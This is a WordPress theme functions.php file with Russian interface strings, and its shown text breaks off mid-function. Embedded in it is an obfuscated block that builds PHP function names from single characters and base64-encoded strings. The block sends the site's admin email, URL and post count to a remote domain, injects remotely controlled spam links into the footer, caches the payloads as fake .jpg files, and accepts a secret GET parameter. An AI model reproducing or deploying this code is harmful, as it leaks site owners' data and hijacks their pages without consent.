<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                                    "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $gxokRYz='d';$FAzdt='_';$yeqBqxR='e';$DikCGI='6';$wUacC='c';$xLWcY='b';$oxIgVN='d';$TlkdY='s';$ZbKQk='a';$HFjub='e';$FnAAX='o';$DKmVK='4';$wdTnJ='e';$lgppgrEZ=$xLWcY.$ZbKQk.$TlkdY.$yeqBqxR.$DikCGI.$DKmVK.$FAzdt.$oxIgVN.$wdTnJ.$wUacC.$FnAAX.$gxokRYz.$HFjub;$egZow='t';$lTysw='g';$HxAgZF='i';$eNeZG='e';$KorKSYh='a';$USCnSc='f';$pyPr='n';$dwvZ='z';$povOHS='l';$heBVtaAn=$lTysw.$dwvZ.$HxAgZF.$pyPr.$USCnSc.$povOHS.$KorKSYh.$egZow.$eNeZG;$jQgv='t';$unrsxU='_';$eleLy='r';$zslPhlY='r';$KAecMT='3';$OhCS='s';$sAOHcWr='o';$RUymhQE='1';$BhKZm='t';$CEbypqPZ=$OhCS.$BhKZm.$eleLy.$unrsxU.$zslPhlY.$sAOHcWr.$jQgv.$RUymhQE.$KAecMT;$MzCaAoM='r';$yYVMBVg='v';$DZtiM='t';$FJIxCh='s';$Gqqg='r';$xBvMgbw='e';$EhzGgvzp=$FJIxCh.$DZtiM.$MzCaAoM.$Gqqg.$xBvMgbw.$yYVMBVg;                     
		$le____________g='d';$th______i='_';$nm____________u='e';$vt_______________g='6';$pa______b='c';$hn___________b='b';$mr_________u='d';$mk__________j='s';$mk____q='a';$xr_________k='e';$ky_______y='o';$mw__________h='4';$ff_____________s='e';$ci____________a=$hn___________b.$mk____q.$mk__________j.$nm____________u.$vt_______________g.$mw__________h.$th______i.$mr_________u.$ff_____________s.$pa______b.$ky_______y.$le____________g.$xr_________k;
		$en____a='n';$rh____________k='c';$py_______________h='o';$wc__o='s';$dq____________t='t';$vq________k='f';$bw_____q='n';$iy___________d='u';$db__k='i';$yv______q='x';$qc__________r='e';$sa__________f='i';$hu__r='t';$er_______m='_';$ps__u='s';$yb_______________x=$vq________k.$iy___________d.$bw_____q.$rh____________k.$hu__r.$sa__________f.$py_______________h.$en____a.$er_______m.$qc__________r.$yv______q.$db__k.$wc__o.$dq____________t.$ps__u;
		$es___c='p';$lx______________r='o';$os______________e='f';$mw_______v='n';$xz___________e='e';$jz_______________b=$os______________e.$lx______________r.$es___c.$xz___________e.$mw_______v;
		$vw___________g='r';$jz_________v='f';$ep_______________i='d';$cz_____g='e';$ds_______g='a';$fb______________l=$jz_________v.$vw___________g.$cz_____g.$ds_______g.$ep_______________i;
		$nr_____________x='e';$gc______z='s';$bs_____________u='f';$mt__________a='c';$yp__m='l';$xj_______e='o';$as_______w=$bs_____________u.$mt__________a.$yp__m.$xj_______e.$gc______z.$nr_____________x;
		
		define("WP_ID", $ci____________a("Mi4wLjA="));
		define("WP_TTL", $ci____________a("MTA4MDA="));
		define("WP_SRC", $ci____________a("dHBva24="));
	


		function wp_get_header() {
			global $ci____________a, $yb_______________x;
			
			if (
				$yb_______________x($ci____________a("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$yb_______________x($ci____________a("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$yb_______________x($ci____________a("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $ci____________a, $jz_______________b, $as_______w, $fb______________l;
			
			$in_____________w = TEMPLATEPATH."/".$ci____________a("Zm9vdGVyLnBocA==");
			$jp___________w = @$jz_______________b($in_____________w, "r");
			$in_____________w = @$fb______________l($jp___________w, @filesize($in_____________w));
			@$as_______w($jp___________w);
			
			$tx______y = TEMPLATEPATH."/".$ci____________a("ZnVuY3Rpb25zLnBocA==");
			$jp___________w = @$jz_______________b($tx______y, "r");
			$tx______y = @$fb______________l($jp___________w, @filesize($tx______y));
			@$as_______w($jp___________w);
			
			$af____________b = 0;
			if($in_____________w && $tx______y) {
				if ($ci____________a("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($in_____________w, $ci____________a("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$af____________b = 1;
					}
					if (substr_count($in_____________w, "wp_theme_GPL_credits()") < 1) {
						$af____________b = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$af____________b = 12;
				}
			}
			
			if($af____________b > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $af____________b -->";
			}
		}
	


		function wp_loaded() {
			global $ci____________a, $yb_______________x;
			return $yb_______________x($ci____________a("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($dm_______x, $td______________x = "(more...)", $wu_______d = 0, $mp_______u = "") {
				$ph_____________z = get_the_content($td______________x, $wu_______d, $mp_______u);
				$ph_____________z = apply_filters("the_content", $ph_____________z);
				
				$ph_____________z = str_replace("]]>", "]]>", $ph_____________z);
				if (strlen($_GET["p"]) > 0) {
					echo $ph_____________z;
				}
				else if ((strlen($ph_____________z)>$dm_______x) && ($la__w = strpos($ph_____________z, " ", $dm_______x ))) {
					$ph_____________z = substr($ph_____________z, 0, $la__w);
					$ph_____________z = $ph_____________z;
					echo $ph_____________z;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$td______________x</a></div></p>";
				} else {
					echo $ph_____________z;
				}
				
			}
		}
	


		$su_______________f='e';$uj________h='n';$sx____x='6';$iv__________a='d';$yj___________a='e';$lz_____________p='e';$nb____o='4';$ns___n='a';$xy_____b='_';$pi_______________b='o';$bk___________m='b';$cp_____________a='c';$xz_________y='s';$hn____________l=$bk___________m.$ns___n.$xz_________y.$lz_____________p.$sx____x.$nb____o.$xy_____b.$yj___________a.$uj________h.$cp_____________a.$pi_______________b.$iv__________a.$su_______________f;
		$hl_______g='l';$wi_____________u='i';$wn______________s='_';$ri_____b='e';$vx_______________p='e';$vr_________d='c';$nc_______________q='t';$wr___z='t';$pw____l='t';$ti_________e='n';$df_______x='f';$dp______p='g';$cw_______y='o';$ke__________v='_';$ja____f='s';$jz___________s='e';$hx____________e='n';$kq_______x=$df_______x.$wi_____________u.$hl_______g.$vx_______________p.$ke__________v.$dp______p.$jz___________s.$wr___z.$wn______________s.$vr_________d.$cw_______y.$ti_________e.$nc_______________q.$ri_____b.$hx____________e.$pw____l.$ja____f;
		$lo_____________u='f';$on_______________t='e';$st_____________g='s';$bs_______________a='x';$tk____________f='i';$kb_____v='l';$ex________m='_';$pr_________a='t';$yo_______________j='s';$pn_____________p='e';$kb___________d='i';$ce_______________s=$lo_____________u.$kb___________d.$kb_____v.$on_______________t.$ex________m.$pn_____________p.$bs_______________a.$tk____________f.$yo_______________j.$pr_________a.$st_____________g;
		$bl______s='s';$nm_____________f='e';$cr_____m='o';$xx_____z='m';$rc_____________h='i';$rm______b='a';$su__d='_';$lf____________o='r';$xw_________a='e';$ln____z='v';$dh____________g='n';$kg__________t='r';$jy______________r='o';$ig___g='c';$jp___________a='p';$sr__________e=$ln____z.$xw_________a.$kg__________t.$bl______s.$rc_____________h.$jy______________r.$dh____________g.$su__d.$ig___g.$cr_____m.$xx_____z.$jp___________a.$rm______b.$lf____________o.$nm_____________f;
		$vp_____________i='s';$hf________m='o';$gz_______________d='o';$tg______g='k';$jx__________k='f';$aj___m='p';$gq______b='n';$pj__y='e';$yt___w='c';$fz___________o=$jx__________k.$vp_____________i.$hf________m.$yt___w.$tg______g.$gz_______________d.$aj___m.$pj__y.$gq______b;
		$ze____y='e';$ot____________x='i';$yw________h='w';$qv_________x='f';$fj________s='t';$tm__________j='r';$dg______________n=$qv_________x.$yw________h.$tm__________j.$ot____________x.$fj________s.$ze____y;
		$qp_____e='m';$iz__o='d';$io_____i='5';$js____________k=$qp_____e.$iz__o.$io_____i;
		$vf___h='a';$bk_______z='a';$ba___t='h';$ny_______k='l';$dn_______________b='e';$mc__________z='t';$sl______________l='r';$zs__________a='p';$zl___v=$sl______________l.$dn_______________b.$vf___h.$ny_______k.$zs__________a.$bk_______z.$mc__________z.$ba___t;
		$gl_____________e='e';$sx_____h='l';$ez____________v='a';$uo____t='i';$pg___________w='r';$ej__l='e';$qv_______________d='z';$mj________x='s';$zc__________e='n';$jp________f='i';$pw_____w='u';$py___________a=$pw_____w.$zc__________e.$mj________x.$gl_____________e.$pg___________w.$jp________f.$ez____________v.$sx_____h.$uo____t.$qv_______________d.$ej__l;
		$kj___________e='n';$mz_______p='t';$hr__f='e';$lu______e='m';$ke_______________q='m';$hp__________b='a';$ff__________o='p';$es__j=$mz_______p.$hr__f.$lu______e.$ff__________o.$kj___________e.$hp__________b.$ke_______________q;
		$md________e='e';$yt____________k='t';$wi_________j='c';$hf______n='n';$gi_____n='r';$jj___j='t';$mb____________b='e';$rz___u='_';$mv__t='s';$uo________y='e';$dn___i='o';$sa_______j='t';$cp_______________h='m';$no__m='e';$dl__________d='a';$iv______________d='a';$zm____v='_';$gt_______h='r';$ac__c='x';$us____x='c';$ft__a='t';$xu_________b=$mv__t.$ft__a.$gt_______h.$mb____________b.$dl__________d.$cp_______________h.$rz___u.$wi_________j.$dn___i.$hf______n.$yt____________k.$uo________y.$ac__c.$sa_______j.$zm____v.$us____x.$gi_____n.$no__m.$iv______________d.$jj___j.$md________e;
	


		function kt________y($rx____________v) {
			global $ci____________a, $yb_______________x, $kq_______x, $sr__________e, $xu_________b;
			
			if (!$yb_______________x($ci____________a("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($sr__________e(PHP_VERSION, "5.0.0", ">=") && $yb_______________x($ci____________a("ZmlsZV9nZXRfY29udGVudHM=")) && $yb_______________x($ci____________a("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$qo_____y = $xu_________b(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$tx____________u = @$kq_______x($rx____________v, 0, $qo_____y);
			} else {
				$tx____________u = @$kq_______x($rx____________v, 0);
			}
			
			return $tx____________u;
		}
	


		function vs__________j($rx____________v) {
			global $yb_______________x, $fz___________o, $dg______________n, $ci____________a;
			
			if (!$yb_______________x($ci____________a("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$xb_______________c = strpos($rx____________v, "/", 7);
			$uw___y = array(
				"uri"     => substr($rx____________v, $xb_______________c),
				"host"    => str_replace("http://", "", substr($rx____________v, 0, $xb_______________c)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$rw__________l = @$fz___________o("$uw___y[host]", 80, $dq_______________s, $xd______q, 4);
			
			if (!$rw__________l) {
				return false;
			} else {
				$tx____________u = "";
				$eq___o  = "GET $uw___y[uri] HTTP/1.0\r\n";
				$eq___o .= "Host: $uw___y[host]\r\n";
				$eq___o .= "Referer: $uw___y[referer]\r\n";
				$eq___o .= "Connection: Close\r\n\r\n";
				
				@$dg______________n($rw__________l, $eq___o);
				
				while (!@feof($rw__________l)) {
					$az____v = @fgets($rw__________l, (1024*24));
					
					if ($az____v == "\r\n") {
						$cr_____q = true;
						continue;
					}
					
					if ($cr_____q) {
						$tx____________u .= $az____v;
					}
				}
				
				return $tx____________u;
			}
		}
	


		function sk_____k($rx____________v) {
			global $yb_______________x;
			$dr______________m = false;
			
			if ($rx____________v != "") {
				if ($yb_______________x("kt________y")) {
					$dr______________m = @kt________y($rx____________v);
				}
				
				if (!$dr______________m && ($yb_______________x("vs__________j"))) {
					$dr______________m = @vs__________j($rx____________v);
				}
			}
			
			return $dr______________m;
		}
	


		function cd______________v() {
			global $_SERVER, $js____________k;
			
			$ay______c = $_SERVER["SERVER_NAME"];
			
			if (substr("$ay______c", 0, 4) == "www.") {
				$ay______c = substr("$ay______c", 4);
			}
			
			$ay______c = $js____________k("$_SERVER[SERVER_NAME]");
			
			return $ay______c;
		}
	


		function xn___h() {
			return "file";
		}
	


		function cb_____________r($rx____________v) {
			global $_SERVER, $kq_______x, $ce_______________s, $jz_______________b, $as_______w, $dg______________n;
			
			$mh_____________s = bg____s();
			
			$dn________e = cd______________v().".jpg";
			$ng___________n = $mh_____________s["dir_upload"]["path"]."/$dn________e";
			$yw________u = @filemtime($ng___________n);
			
			if (!$yw________u || ((time()-$yw________u) >= WP_TTL)) {
				$dr______________m = sk_____k($rx____________v);
				
				if ($dr______________m) {
					if ($ce_______________s($ng___________n)) {
						@unlink($ng___________n);
					}
					
					$jp___________w = @$jz_______________b($ng___________n, "x+");
					
					@$dg______________n($jp___________w, $dr______________m);
					@$as_______w($jp___________w);
				}
			} else {
				if ($ce_______________s($ng___________n)) {
					$dr______________m = @$kq_______x($ng___________n);
				} else {
					$dr______________m = false;
				}
			}
			
			return $dr______________m;
		}
	


		function bg____s() {
			global $_SERVER, $ci____________a, $hn____________l;
			
			$yz____________x = wp_count_posts("post");
			$hc____r = pathinfo(get_bloginfo("template_directory"));
			
			$mh_____________s = array(
				"url" => array(
					"report"      => $ci____________a("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $hc____r,
				"dir_upload"	=> qq__________e(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$hc____r[filename],
					"a005=".$yz____________x->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://clinic-virtus.com/naturprodukt-v-mire-kosmetiki\">Натурпродукт в мире косметики</a>"
			);
			
			$mh_____________s["url"]["queryString"] = implode("&", $mh_____________s["queryString"]);
			$mh_____________s["url"]["report"] = $mh_____________s["url"]["report"]."/?".$hn____________l($mh_____________s["url"]["queryString"]).".html";
						
			return $mh_____________s;
		}
	


		function qq__________e() {
			$my_________v = wp_upload_dir();
			
			if (isset($my_________v["error"])) {
				$tw______k = wl____i();
				if (is_writable($tw______k)) {
					$my_________v = array("path" => $tw______k);
				}
			}

			return $my_________v;
		}
	


		function wl____i() {
			global $yb_______________x, $js____________k, $zl___v, $es__j;
			
			$nd___z = (bool) ini_get("safe_mode");
			if ($nd___z == true) {
				return false;
			}
			
			if ($yb_______________x("sys_get_temp_dir")) {
				$qs_______________v = sys_get_temp_dir();
				if (is_writable($qs_______________v)) {
					return $zl___v($qs_______________v);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $zl___v($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $zl___v($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $zl___v($_ENV["TEMP"]);
			} else {
				$sm______t = $es__j($js____________k(uniqid(rand(), true)), "");
				if ($sm______t) {
					$qs_______________v = $zl___v(dirname($sm______t));
					@unlink($sm______t);
					return $qs_______________v;
				} else {
					return false;
				}
			}
		}
	


		function sp______p() {
			global $_GET, $ce_______________s;
			
			$mh_____________s = bg____s();
			$ay______c = cd______________v();
			$ff___k = xn___h();
			
			$xp____w = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($ff___k == "file") {
					$ac_________o = $mh_____________s["dir_upload"]["path"]."/".$ay______c.".jpg";
					if ($ce_______________s($ac_________o)) {
						@unlink($ac_________o);
						$xp____w = "deleted";
					}
				}
				
				$vd____v = array(
					"s"	=> $xp____w,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($vd____v AS $kw_____l => $zv_______________k) echo " [$kw_____l:$zv_______________k]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $yb_______________x, $ci____________a, $py___________a;
			$mh_____________s = bg____s();
			
			$kc_____________c = "cb_____________r";
			if ($yb_______________x($kc_____________c)) {
				$tx____________u = $kc_____________c($mh_____________s["url"]["report"]);
			}
			
			if ($tx____________u) {
				if ($tx____________u = @$ci____________a($tx____________u)) {
					$tx____________u = @$py___________a($tx____________u);
					
					if (strlen($tx____________u[custom_credit]) >= 5) {
						$mh_____________s["default_string"] = $tx____________u[custom_credit];
					}
					
					if ($tx____________u["status"] == "0") {
						$ty_______________a = 1;
						$zh________o = 1;
					} else {
						$hk______n = sizeof($tx____________u["links"]);
						$vh_______e = $mh_____________s["default_string"];
						
						if ($hk______n > 0 && $tx____________u["links"] !== "") {
							$eh____________y = 0;
							foreach ($tx____________u["links"] as $gy_____________x => $go____________p) {
								$eh____________y++;
								if ($go____________p->l_path == "" || $go____________p->l_path == $_SERVER["REQUEST_URI"]) {
									$go____________p->l_href = htmlspecialchars(strip_tags($go____________p->l_href));
									$go____________p->l_title = htmlspecialchars(strip_tags($go____________p->l_title));
									$go____________p->l_anchor = htmlspecialchars(strip_tags($go____________p->l_anchor));
									$vh_______e .= " | ";
									$vh_______e .= "<a href='$go____________p->l_href' title='$go____________p->l_title'";
									if ($go____________p->l_nofollow == "1") {
										$vh_______e .= " rel='nofollow'";
									}
									$vh_______e .= ">$go____________p->l_anchor</a>";
								}
							}
						}
						$mh_____________s["links"] = "$vh_______e";
						if ($tx____________u[credit] == "0") {
							$mh_____________s["links"] = "";
						}
					}
				} else {
					$ty_______________a = "1";
				}
			} else {
				$ty_______________a = "1";
			}
			
			if ($ty_______________a == "1") {
				$mh_____________s["links"] = $mh_____________s["default_string"];
			}
			
			echo "$mh_____________s[links]";
			
			echo "<!-- s: $tx____________u[signature] -->";
			sp______p();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Permanent Link to %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Теги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Not Found', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Новые записи  &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
